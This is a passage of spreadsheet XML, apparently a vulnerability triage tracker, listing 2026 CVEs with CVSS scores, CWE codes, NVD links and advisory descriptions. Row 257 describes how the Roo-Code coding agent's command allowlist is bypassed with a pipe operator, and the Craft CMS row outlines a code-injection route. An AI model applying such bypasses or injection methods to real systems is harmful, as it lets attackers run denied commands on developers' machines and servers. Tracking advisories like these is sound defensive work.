      </c>
    </row>
    <row r="256">
      <c r="A256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B256" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81996</t>
        </is>
      </c>
      <c r="D256" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F256" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G256" s="5" t="inlineStr"/>
      <c r="H256" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I256" s="5" t="inlineStr"/>
      <c r="J256" s="5" t="inlineStr"/>
      <c r="K256" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L256" s="5" t="inlineStr"/>
      <c r="M256" s="5" t="inlineStr"/>
      <c r="N256" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P256" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q256" s="5" t="inlineStr"/>
      <c r="R256" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S256" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an Incorrect Authorization vulnerability that could result in privilege escalation. A low-privileged attacker could exploit this vulnerability to gain elevated access. Exploitation of this issue does not require user interaction. Scope is changed.</t>
        </is>
      </c>
      <c r="T256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81996</t>
        </is>
      </c>
    </row>
    <row r="257">
      <c r="A257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B257" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82536</t>
        </is>
      </c>
      <c r="D257" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G257" s="5" t="inlineStr"/>
      <c r="H257" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I257" s="5" t="inlineStr"/>
      <c r="J257" s="5" t="inlineStr"/>
      <c r="K257" s="5" t="inlineStr"/>
      <c r="L257" s="5" t="inlineStr"/>
      <c r="M257" s="5" t="inlineStr"/>
      <c r="N257" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q257" s="5" t="inlineStr"/>
      <c r="R257" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S257" s="5" t="inlineStr">
        <is>
          <t>Roo-Code through 3.54.0 contains an auto-approve bypass vulnerability in the shell command parsing logic that allows attackers to execute denied shell commands by exploiting the omission of the bash pipe operator from the command parser's operator token set. Attackers can craft a command line with an allowlisted prefix followed by the stderr-redirecting pipe operator and a denied command, causing the parser to approve the full pipeline while bash executes the denied component with the agent's auto-execute privileges on the developer's machine.</t>
        </is>
      </c>
      <c r="T257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82536</t>
        </is>
      </c>
    </row>
    <row r="258">
      <c r="A258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B258" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83941</t>
        </is>
      </c>
      <c r="D258" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G258" s="5" t="inlineStr"/>
      <c r="H258" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I258" s="5" t="inlineStr"/>
      <c r="J258" s="5" t="inlineStr"/>
      <c r="K258" s="5" t="inlineStr">
        <is>
          <t>microsoft:entra_id</t>
        </is>
      </c>
      <c r="L258" s="5" t="inlineStr"/>
      <c r="M258" s="5" t="inlineStr"/>
      <c r="N258" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P258" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q258" s="5" t="inlineStr"/>
      <c r="R258" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S258" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Entra ID allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83941</t>
        </is>
      </c>
    </row>
    <row r="259">
      <c r="A259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B259" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83992</t>
        </is>
      </c>
      <c r="D259" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F259" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G259" s="5" t="inlineStr"/>
      <c r="H259" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I259" s="5" t="inlineStr"/>
      <c r="J259" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K25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59" s="5" t="inlineStr"/>
      <c r="M259" s="5" t="inlineStr"/>
      <c r="N259" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O259" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P259" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q259" s="5" t="inlineStr"/>
      <c r="R259" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S259" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83992</t>
        </is>
      </c>
    </row>
    <row r="260">
      <c r="A260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B260" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83996</t>
        </is>
      </c>
      <c r="D260" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F260" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G260" s="5" t="inlineStr"/>
      <c r="H260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I260" s="5" t="inlineStr"/>
      <c r="J260" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K26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60" s="5" t="inlineStr"/>
      <c r="M260" s="5" t="inlineStr"/>
      <c r="N260" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P260" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q260" s="5" t="inlineStr"/>
      <c r="R260" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S260" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83996</t>
        </is>
      </c>
    </row>
    <row r="261">
      <c r="A261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B261" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83998</t>
        </is>
      </c>
      <c r="D261" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F261" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G261" s="5" t="inlineStr"/>
      <c r="H261" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I261" s="5" t="inlineStr"/>
      <c r="J261" s="5" t="inlineStr"/>
      <c r="K261" s="5" t="inlineStr"/>
      <c r="L261" s="5" t="inlineStr"/>
      <c r="M261" s="5" t="inlineStr"/>
      <c r="N261" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O261" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P261" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q261" s="5" t="inlineStr"/>
      <c r="R261" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S261" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Remote Desktop Client allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83998</t>
        </is>
      </c>
    </row>
    <row r="262">
      <c r="A262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B262" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85877</t>
        </is>
      </c>
      <c r="D262" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F262" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G262" s="5" t="inlineStr"/>
      <c r="H262" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I262" s="5" t="inlineStr"/>
      <c r="J262" s="5" t="inlineStr"/>
      <c r="K262" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2</t>
        </is>
      </c>
      <c r="L262" s="5" t="inlineStr"/>
      <c r="M262" s="5" t="inlineStr"/>
      <c r="N262" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O262" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P262" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q262" s="5" t="inlineStr"/>
      <c r="R262" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S262" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Print Spooler Components allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85877</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86076</t>
        </is>
      </c>
      <c r="D263" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L263" s="5" t="inlineStr"/>
      <c r="M263" s="5" t="inlineStr"/>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P263" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86076</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86083</t>
        </is>
      </c>
      <c r="D264" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr">
        <is>
          <t>n8n:n8n</t>
        </is>
      </c>
      <c r="L264" s="5" t="inlineStr"/>
      <c r="M264" s="5" t="inlineStr"/>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P264" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86083</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86730</t>
        </is>
      </c>
      <c r="D265" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr"/>
      <c r="M265" s="5" t="inlineStr"/>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t>
        </is>
      </c>
      <c r="T265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t>
        </is>
      </c>
    </row>
    <row r="266">
      <c r="A266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B266" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-12611</t>
        </is>
      </c>
      <c r="D266" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F266" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G266" s="5" t="inlineStr"/>
      <c r="H266" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I266" s="5" t="inlineStr"/>
      <c r="J266" s="5" t="inlineStr"/>
      <c r="K266" s="5" t="inlineStr"/>
      <c r="L266" s="5" t="inlineStr"/>
      <c r="M266" s="5" t="inlineStr"/>
      <c r="N266" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P266" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q266" s="5" t="inlineStr"/>
      <c r="R266" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S266" s="5" t="inlineStr">
        <is>
          <t>A client may issue HTTP/2 requests to a Jetty server that result in blocking writes that are never unblocked, eventually causing all threads to be blocked and the whole server to become unresponsive.
This is caused by a race condition in the server when handling RST_STREAM frames and GOAWAY frames sent by the client.
The race condition "resets" the HTTP2Flusher.terminated, previously set to a non-null value, to the null value, allowing entries to be enqueued in the flusher that however will never be processed. These unprocessed entries are the ones that would unblock the write-blocked threads.</t>
        </is>
      </c>
      <c r="T266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-12611</t>
        </is>
      </c>
    </row>
    <row r="267">
      <c r="A267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B267" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-33197</t>
        </is>
      </c>
      <c r="D267" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F267" s="5" t="inlineStr">
        <is>
          <t>biossecurity@ami.com</t>
        </is>
      </c>
      <c r="G267" s="5" t="inlineStr"/>
      <c r="H267" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I267" s="5" t="inlineStr"/>
      <c r="J267" s="5" t="inlineStr"/>
      <c r="K267" s="5" t="inlineStr"/>
      <c r="L267" s="5" t="inlineStr"/>
      <c r="M267" s="5" t="inlineStr"/>
      <c r="N267" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q267" s="5" t="inlineStr"/>
      <c r="R267" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="S267" s="5" t="inlineStr">
        <is>
          <t>AMI APTIOV contains a vulnerability in BIOS where a privileged user may cause the “Incomplete List of Disallowed Inputs” by local access. Successful exploitation of this vulnerability may lead to arbitrary code execution and impact system Confidentiality, Integrity, and Availability.</t>
        </is>
      </c>
      <c r="T267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-33197</t>
        </is>
      </c>
    </row>
    <row r="268">
      <c r="A268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B268" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55250</t>
        </is>
      </c>
      <c r="D268" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F268" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G268" s="5" t="inlineStr"/>
      <c r="H268" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I268" s="5" t="inlineStr"/>
      <c r="J268" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K268" s="5" t="inlineStr"/>
      <c r="L268" s="5" t="inlineStr"/>
      <c r="M268" s="5" t="inlineStr"/>
      <c r="N268" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P268" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q268" s="5" t="inlineStr"/>
      <c r="R268" s="5" t="inlineStr">
        <is>
          <t>CWE-294, CWE-613, CWE-672</t>
        </is>
      </c>
      <c r="S268" s="5" t="inlineStr">
        <is>
          <t>Maravel, a PHP framework oriented towards dependency injection, prior to version 10.74.0 has a high-severity Token Replay Vulnerability arising from a structural lifecycle mismatch between stateless token validation engines and high-performance relational caching layers. Any application with low cache memory that causes premature eviction to free up memory and applications running macropay-solutions/maravel-framework that utilize tymon/jwt-auth for API token authentication and blacklist management or any other package that does the same may be affected. This architectural risk might also impact native Laravel applications utilizing cache tags under specific volatile or eviction-capped environments. tymon/jwt-auth automatically probes for cache tag support. If found, it forcefully wraps 14-day token blacklist entries (jti) inside a relational tymon.jwt tag. In environments where the O(1) Atomic Lazy Eviction model is active — either natively inside Maravel-Framework v20.x or manually backported into v10.x via the explicit DI container singletons provided in PR #104 (App\Cache\TaggedCache and App\Cache\TagSet) — a strict global tracking ceiling (Container::TAGGED_CACHE_TTL_CAP_SECONDS) of 7,200 seconds (2 hours) is enforced to secure the system against memory index bloat. This ceiling forcefully truncates the 14-day blacklist lifespan down to a maximum of 2 hours, after which individual tracking keys naturally expire and disappear from the active cache window. Furthermore, because the optimized engine implements a generational version matrix to achieve O(1) flush speeds, any programmatic or manual invocation of a tag flush or reset (e.g., Cache::tags([...])-&gt;flush()) instantly bumps the internal atomic master version pointer. This shifts the computed cryptographic composite hash (sha1($this-&gt;tags-&gt;getNamespace())) for all overlapping components, rendering the entire existing index immediately unreachable. Consequently, through either natural 2-hour expiration or an intervening tag flush execution (like the cache naturally cleaning old values to free up memory), the invalidation state records are entirely wiped out. Because the tokens' physical cryptographic signatures remain structurally valid for up to 14 days, stolen, hijacked, or legitimately logged-out tokens are instantly and silently resurrected across the entire API gateway, leaving the application critically vulnerable to widespread Token Replay Attacks. Because this issue is caused by an upstream architectural assumption within the tymon/jwt-auth package rather than a core defect inside the framework, there is no direct framework version upgrade that can safely bypass this lifecycle collision without breaking business cache recycling bounds. Maravel version 10.74.0 introduced a way to backport the new fixed tagged cache from 20.x into 10.x by resolving TagSet and TaggedCache from DI, which is how this latent architectural lifecycle vulnerability was discovered. Users must apply the decoupled configuration workaround outlined below. As a workaround, make sure that cache memory size does not generate early natural evictions from cache to free up space, deleting blacklisted jwt ids before they expire. Applications must decouple flat authentication vectors from the relational tagging subsystem. This forces token identifiers to write directly to the primary cache keyspace as flat, un-tagged key-value pairs where they securely retain their unclipped 14-day lifecycle.</t>
        </is>
      </c>
      <c r="T268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55250</t>
        </is>
      </c>
    </row>
    <row r="269">
      <c r="A269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B269" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62648</t>
        </is>
      </c>
      <c r="D269" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F269" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G269" s="5" t="inlineStr"/>
      <c r="H269" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I269" s="5" t="inlineStr"/>
      <c r="J269" s="5" t="inlineStr"/>
      <c r="K269" s="5" t="inlineStr"/>
      <c r="L269" s="5" t="inlineStr"/>
      <c r="M269" s="5" t="inlineStr"/>
      <c r="N269" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q269" s="5" t="inlineStr"/>
      <c r="R269" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S269" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The length of the URL component contained in pre-authenticated HTTP messages is not properly validated before appending additional data to it, resulting in an out-of-bounds write condition in memory. This could allow an unauthenticated remote attacker to crash the affected device, causing a reboot and resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62648</t>
        </is>
      </c>
    </row>
    <row r="270">
      <c r="A270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B270" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62649</t>
        </is>
      </c>
      <c r="D270" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F270" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G270" s="5" t="inlineStr"/>
      <c r="H270" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I270" s="5" t="inlineStr"/>
      <c r="J270" s="5" t="inlineStr"/>
      <c r="K270" s="5" t="inlineStr"/>
      <c r="L270" s="5" t="inlineStr"/>
      <c r="M270" s="5" t="inlineStr"/>
      <c r="N270" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P270" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q270" s="5" t="inlineStr"/>
      <c r="R270" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S270" s="5" t="inlineStr">
        <is>
          <t>A vulnerability has been identified in Reyrolle 7SR5 (All versions &lt; V2.70). The web server does not properly limit or manage system resources when processing a high volume of concurrent HTTP requests. This could allow an unauthenticated remote attacker to cause the entire device to crash and reboot, resulting in a denial-of-service condition.</t>
        </is>
      </c>
      <c r="T270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62649</t>
        </is>
      </c>
    </row>
    <row r="271">
      <c r="A271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B271" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62650</t>
        </is>
      </c>
      <c r="D271" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F271" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G271" s="5" t="inlineStr"/>
      <c r="H271" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I271" s="5" t="inlineStr"/>
      <c r="J271" s="5" t="inlineStr"/>
